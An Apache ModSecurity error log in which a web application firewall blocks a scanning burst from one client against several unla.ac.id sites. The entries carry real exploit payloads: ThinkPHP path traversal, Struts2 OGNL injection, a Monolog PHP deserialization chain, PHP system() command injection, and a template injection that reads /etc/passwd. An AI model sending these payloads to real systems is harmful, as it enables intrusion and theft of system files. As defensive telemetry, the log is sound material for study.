[Tue Aug 29 11:34:59.321856 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../vendor/topthink/think-trace/src/TraceDebug"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11c8Co-f0AAATfd4MAAAAk"]
[Tue Aug 29 11:34:59.322502 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../vendor/topthink/think-trace/src/TraceDebug"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11c8Co-f0AAATWYR4AAAAa"]
[Tue Aug 29 11:34:59.337199 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../vendor/topthink/think-trace/src/TraceDebug"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11c8Co-f0AAASOUpwAAAAR"]
[Tue Aug 29 11:34:59.380469 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11c8Co-f0AAASHh9QAAAAD"]
[Tue Aug 29 11:34:59.386682 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../vendor/topthink/think-trace/src/TraceDebug"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11c8Co-f0AAARdiTEAAAAK"]
[Tue Aug 29 11:35:00.534205 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:lang: ../../thinkphp/base"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11dMCo-f0AAAUKhAoAAABC"]
[Tue Aug 29 11:35:01.301192 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:id: %{(#instancemanager=#application[\\x22org.apache.tomcat.InstanceManager\\x22]).(#stack=#attr[\\x22com.opensymphony.xwork2.util.ValueStack.ValueStack\\x22]).(#bean=#instancemanager.newInstance(\\x22org.apache.commons.collections.BeanMap\\x22)).(#bean.setBean(#stack)).(#context=#bean.get(\\x22context\\x22)).(#bean.setBean(#context)).(#macc=#bean.get(\\x22memberAccess\\x22)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\\x22java.util.HashSet\\x22)).(#bean.put(\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11dcCo-f0AAAUJIzEAAABB"]
[Tue Aug 29 11:35:01.303488 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:id: %{(#instancemanager=#application[\\x22org.apache.tomcat.InstanceManager\\x22]).(#stack=#attr[\\x22com.opensymphony.xwork2.util.ValueStack.ValueStack\\x22]).(#bean=#instancemanager.newInstance(\\x22org.apache.commons.collections.BeanMap\\x22)).(#bean.setBean(#stack)).(#context=#bean.get(\\x22context\\x22)).(#bean.setBean(#context)).(#macc=#bean.get(\\x22memberAccess\\x22)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\\x22java.util.HashSet\\x22)).(#bean.put(\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11dcCo-f0AAAUOaUoAAABG"]
[Tue Aug 29 11:35:01.337113 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:id: %{(#instancemanager=#application[\\x22org.apache.tomcat.InstanceManager\\x22]).(#stack=#attr[\\x22com.opensymphony.xwork2.util.ValueStack.ValueStack\\x22]).(#bean=#instancemanager.newInstance(\\x22org.apache.commons.collections.BeanMap\\x22)).(#bean.setBean(#stack)).(#context=#bean.get(\\x22context\\x22)).(#bean.setBean(#context)).(#macc=#bean.get(\\x22memberAccess\\x22)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\\x22java.util.HashSet\\x22)).(#bean.put(\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11dcCo-f0AAATxvY8AAAAw"]
[Tue Aug 29 11:35:01.343750 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../vendor/topthink/think-trace/src/TraceDebug"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11dcCo-f0AAATUxRoAAAAW"]
[Tue Aug 29 11:35:01.364149 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:id: %{(#instancemanager=#application[\\x22org.apache.tomcat.InstanceManager\\x22]).(#stack=#attr[\\x22com.opensymphony.xwork2.util.ValueStack.ValueStack\\x22]).(#bean=#instancemanager.newInstance(\\x22org.apache.commons.collections.BeanMap\\x22)).(#bean.setBean(#stack)).(#context=#bean.get(\\x22context\\x22)).(#bean.setBean(#context)).(#macc=#bean.get(\\x22memberAccess\\x22)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\\x22java.util.HashSet\\x22)).(#bean.put(\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11dcCo-f0AAAUdm4YAAABS"]
[Tue Aug 29 11:35:01.370196 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:id: %{(#instancemanager=#application[\\x22org.apache.tomcat.InstanceManager\\x22]).(#stack=#attr[\\x22com.opensymphony.xwork2.util.ValueStack.ValueStack\\x22]).(#bean=#instancemanager.newInstance(\\x22org.apache.commons.collections.BeanMap\\x22)).(#bean.setBean(#stack)).(#context=#bean.get(\\x22context\\x22)).(#bean.setBean(#context)).(#macc=#bean.get(\\x22memberAccess\\x22)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\\x22java.util.HashSet\\x22)).(#bean.put(\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11dcCo-f0AAATSkoAAAAAT"]
[Tue Aug 29 11:35:02.305563 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:blowf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:blowf: system('echo CVE-2022-1609 | rev');"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-json/am-member/license"] [unique_id "ZO11dsCo-f0AAAVK0HcAAAAB"]
[Tue Aug 29 11:35:02.324215 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:blowf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:blowf: system('echo CVE-2022-1609 | rev');"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-json/am-member/license"] [unique_id "ZO11dsCo-f0AAARdiTQAAAAK"]
[Tue Aug 29 11:35:02.328845 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:id: %{(#instancemanager=#application[\\x22org.apache.tomcat.InstanceManager\\x22]).(#stack=#attr[\\x22com.opensymphony.xwork2.util.ValueStack.ValueStack\\x22]).(#bean=#instancemanager.newInstance(\\x22org.apache.commons.collections.BeanMap\\x22)).(#bean.setBean(#stack)).(#context=#bean.get(\\x22context\\x22)).(#bean.setBean(#context)).(#macc=#bean.get(\\x22memberAccess\\x22)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\\x22java.util.HashSet\\x22)).(#bean.put(\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11dsCo-f0AAAUNalUAAABF"]
[Tue Aug 29 11:35:02.346709 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user[searchprefs]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :\\x22\\x00*\\x00 found within ARGS:user[searchprefs]: a:2:{i:0;O:27:\\x22googlelogin_vendor_autoload\\x22:0:{}i:1;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;r:4;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:14:\\x22CVE-2023-25135\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14:\\x22\\x00*\\x00initialized\\x22;b:1;s:14:\\x22\\x00*\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ajax/api/user/save"] [unique_id "ZO11dsCo-f0AAATxvZAAAAAw"]
[Tue Aug 29 11:35:02.350018 2023] [:error] [pid 1360] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user[searchprefs]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :\\x22\\x00*\\x00 found within ARGS:user[searchprefs]: a:2:{i:0;O:27:\\x22googlelogin_vendor_autoload\\x22:0:{}i:1;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;r:4;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:14:\\x22CVE-2023-25135\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14:\\x22\\x00*\\x00initialized\\x22;b:1;s:14:\\x22\\x00*\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ajax/api/user/save"] [unique_id "ZO11dsCo-f0AAAVQYx4AAAAI"]
[Tue Aug 29 11:35:02.350254 2023] [:error] [pid 1281] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:blowf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:blowf: system('echo CVE-2022-1609 | rev');"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-json/am-member/license"] [unique_id "ZO11dsCo-f0AAAUB02cAAAA5"]
[Tue Aug 29 11:35:02.352792 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user[searchprefs]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :\\x22\\x00*\\x00 found within ARGS:user[searchprefs]: a:2:{i:0;O:27:\\x22googlelogin_vendor_autoload\\x22:0:{}i:1;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;r:4;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:14:\\x22CVE-2023-25135\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14:\\x22\\x00*\\x00initialized\\x22;b:1;s:14:\\x22\\x00*\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ajax/api/user/save"] [unique_id "ZO11dsCo-f0AAARdiTUAAAAK"]
[Tue Aug 29 11:35:02.354051 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user[searchprefs]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :\\x22\\x00*\\x00 found within ARGS:user[searchprefs]: a:2:{i:0;O:27:\\x22googlelogin_vendor_autoload\\x22:0:{}i:1;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;r:4;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:14:\\x22CVE-2023-25135\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14:\\x22\\x00*\\x00initialized\\x22;b:1;s:14:\\x22\\x00*\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ajax/api/user/save"] [unique_id "ZO11dsCo-f0AAAUQ7scAAABH"]
[Tue Aug 29 11:35:02.354643 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user[searchprefs]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :\\x22\\x00*\\x00 found within ARGS:user[searchprefs]: a:2:{i:0;O:27:\\x22googlelogin_vendor_autoload\\x22:0:{}i:1;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;r:4;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:14:\\x22CVE-2023-25135\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14:\\x22\\x00*\\x00initialized\\x22;b:1;s:14:\\x22\\x00*\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajax/api/user/save"] [unique_id "ZO11dsCo-f0AAATUxRwAAAAW"]
[Tue Aug 29 11:35:02.358594 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:blowf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:blowf: system('echo CVE-2022-1609 | rev');"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-json/am-member/license"] [unique_id "ZO11dsCo-f0AAAUDQTwAAAA7"]
[Tue Aug 29 11:35:02.360465 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:blowf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:blowf: system('echo CVE-2022-1609 | rev');"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-json/am-member/license"] [unique_id "ZO11dsCo-f0AAATQXiMAAAAO"]
[Tue Aug 29 11:35:03.317774 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_dlg[captcha][target]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c')\\x5c found within ARGS:_dlg[captcha][target]: system(\\x5c'ver\\x5c')\\x5c"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO11d8Co-f0AAAUQ7sgAAABH"]
[Tue Aug 29 11:35:03.318071 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:CSRF-TOKEN. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:CSRF-TOKEN: rnqvt{{shell_exec(cat/etc/passwd)}}to5gw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAUXLkAAAABM"]
[Tue Aug 29 11:35:03.318707 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_dlg[captcha][target]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c')\\x5c found within ARGS:_dlg[captcha][target]: system(\\x5c'ver\\x5c')\\x5c"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO11d8Co-f0AAASHh9gAAAAD"]
[Tue Aug 29 11:35:03.319547 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:CSRF-TOKEN. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:CSRF-TOKEN: rnqvt{{shell_exec(cat/etc/passwd)}}to5gw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAVJXkwAAAAA"]
[Tue Aug 29 11:35:03.319842 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_dlg[captcha][target]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c')\\x5c found within ARGS:_dlg[captcha][target]: system(\\x5c'ver\\x5c')\\x5c"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO11d8Co-f0AAAUOaU0AAABG"]
[Tue Aug 29 11:35:03.319959 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:CSRF-TOKEN. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:CSRF-TOKEN: rnqvt{{shell_exec(cat/etc/passwd)}}to5gw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAASEJYYAAAAE"]
